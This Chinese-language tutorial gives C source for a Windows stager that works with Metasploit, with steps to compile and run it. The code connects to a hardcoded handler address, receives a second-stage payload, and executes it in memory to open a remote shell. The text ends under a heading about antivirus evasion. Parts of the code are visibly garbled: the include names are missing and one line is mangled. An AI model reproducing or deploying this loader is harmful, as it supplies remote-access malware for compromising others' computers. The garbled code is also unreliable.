环境
将 Project 设置为 C Project ,将应用程序设置为Console Application 。从命令行执行

粘贴下面代码
/*
* A C-based stager client compat with the Metasploit Framework
* based on a discussion on the Metasploit Framework mailing list
*
* @author Raphael Mudge (raffi@strategiccyber.com)
* @license BSD License.
*
* Relevant messages:
* * http://mail.metasploit.com/piper ... ptember/008660.html
* * http://mail.metasploit.com/piper ... ptember/008664.html
*/
#include
#include
#include
#include
/* init winsock */
void winsock_init() {
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("ws2_32.dll is out of date.\n");
WSACleanup();
exit(1);
}
}
/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
printf("Bad things: %s\n", error);
closesocket(my_socket);
WSACleanup();
exit(1);
}
/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
int tret = 0;
int nret = 0;
void * startb = buffer;
while (tret < len) {
nret = recv(my_socket, (char *)startb, len - tret, 0);
startb += nret;
tret += nret;
if (nret == SOCKET_ERROR)
punt(my_socket, "Could not receive data");
}
return tret;
}
/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
struct hostent * target;
struct sockaddr_in sock;
SOCKET my_socket;
/* setup our socket */
my_socket = socket(AF_INET, SOCK_STREAM, 0);
if (my_socket == INVALID_SOCKET)
punt(my_socket, "Could not initialize socket");
/* resolve our target */
target = gethostbyname(targetip);
if (target == NULL)
punt(my_socket, "Could not resolve target");
/* copy our target information into the sock */
memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
/* attempt to connect */
if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
punt(my_socket, "Could not connect to target");
return my_socket;
}
int main(int argc, char * argv[]) {
ULONG32 size;
char * buffer;
void (*function)();
winsock_init();
if (argc != 3) {
printf("%s [host] [port]\n", argv[0]);
exit(1);
}
/* connect to the handler */
SOCKET my_socket = wsconnect("192.168.123.33", 5555);
/* read the 4-byte length */
int count = recv(my_socket, (char *)&size, 4, 0);
if (count != 4 || size mov edi, 0x12345678 */
buffer[0] = 0x48;
buffer[0] = 0xBF;
/* copy the value of our socket to the buffer */
memcpy(buffer + 2, &my_socket, 8);
/* read bytes into the buffer */
count = recv_all(my_socket, buffer + 10, size);
/* cast our buffer as a function and call it */
function = (void (*)())buffer;
function();
return 0;
}
修改SOCKET my_socket = wsconnect("192.168.123.33", 5555); 为你的IP和端口。
编译选项中添加-lws2_32
按F9 编译并在msf中监听!
在cmd 中执行下面命令
Loader64.exe 192.168.123.33 5555
成功得到shell

免杀效果

|